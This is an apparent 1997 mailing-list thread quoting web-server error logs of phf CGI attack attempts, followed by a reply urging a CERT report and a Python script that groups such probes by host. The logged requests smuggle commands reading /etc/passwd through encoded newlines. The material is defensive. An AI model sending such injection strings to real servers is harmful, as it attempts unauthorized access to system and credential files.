Date: | Fri, 9 May 1997 16:37:01 -0400 |
Content-Type: | text/plain |
<snip>
/WWW/WWW/ARPA/httpd_1.3/logs>cat error | grep phf
[Sun Mar 23 11:22:39 1997] httpd: access to /cgi-bin/phf?Qname=%0Acat%20/etc/p
swd denied for t6o16p8.telia.com, reason: file not found
[Sun Apr 6 17:37:06 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs7-2.worldaccess.nl, reason: file not found
[Tue Apr 8 15:17:31 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs8-14.worldaccess.nl, reason: file not found
[Thu Apr 17 06:47:50 1997] httpd: access to /cgi-bin/phf?Q=%0aid denied for pc
-slip.ccs-stag.deakin.edu.au, reason: file not found
[Mon Apr 21 15:03:31 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for wxs8-4.worldaccess.nl, reason: file not found
[Wed Apr 23 06:58:00 1997] httpd: access to /cgi-bin/phf?Qname=asd=%0acat%20/e
/passwd denied for wimol2.wimol.ksc.co.th, reason: file not found
[Mon May 5 06:27:41 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/cat%2
etc/passwd denied for 139.134.243.139, reason: file not found
While I don't know if phf can get to files in other accounts on the 3000(?),
it's still best disabled. Be careful out there.
-Chris Bartram
</snip>
Chris,
Thank you for warning us about this weakness.
Is there anyone you can send this file fragment to, to let them know that
you have intruders attempting to exploit a well-known weakness?
Organizations like CERT and others?
Marshall Medoff, ITA, Inc.
Arlington, Virginia
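
An added example, not part of either message above: one way to turn error-log entries like the quoted ones into a per-host summary suitable for forwarding to an incident-response contact. It assumes complete (unwrapped) log lines in the format shown in the excerpt; the function name `find_probes` and the sample lines and host names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Error-log shape as seen in the quoted excerpt:
# [timestamp] httpd: access to <path> denied for <host>, reason: <text>
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] httpd: access to (?P<path>\S+) "
    r"denied for (?P<host>[^,\s]+), reason: (?P<reason>.*)$"
)
# An encoded line feed or carriage return in a CGI query string is the probe signature.
ENCODED_EOL = re.compile(r"%0[ad]", re.IGNORECASE)


def find_probes(lines):
    """Return {host: [(timestamp, script, decoded_query), ...]} for CGI probes."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not an access-denied entry in the expected format
        script, _, query = m.group("path").partition("?")
        if not script.startswith("/cgi-bin/") or not ENCODED_EOL.search(query):
            continue  # ordinary request, or not aimed at a CGI script
        hits[m.group("host")].append((m.group("ts"), script, unquote(query)))
    return dict(hits)


# Constructed sample lines (not copied from the post; hosts are reserved example names).
SAMPLE_LOG = """\
[Mon May  5 06:27:41 1997] httpd: access to /cgi-bin/phf?Qalias=x%0a/bin/id denied for host1.example.net, reason: file not found
[Mon May  5 06:30:02 1997] httpd: access to /cgi-bin/phf?Qname=smith denied for host2.example.org, reason: file not found
[Mon May  5 07:11:19 1997] httpd: access to /cgi-bin/phf?Q=%0Aid denied for host1.example.net, reason: file not found
[Mon May  5 07:12:00 1997] httpd: access to /docs/index.html denied for host3.example.com, reason: file not found
""".splitlines()

if __name__ == "__main__":
    for host, events in sorted(find_probes(SAMPLE_LOG).items()):
        print(f"{host}: {len(events)} probe(s)")
        for ts, script, query in events:
            print(f"  {ts}  {script}  query={query!r}")
```

Lines wrapped or cut at the terminal width, as in the excerpt above, will not match the pattern; run it against the log file itself.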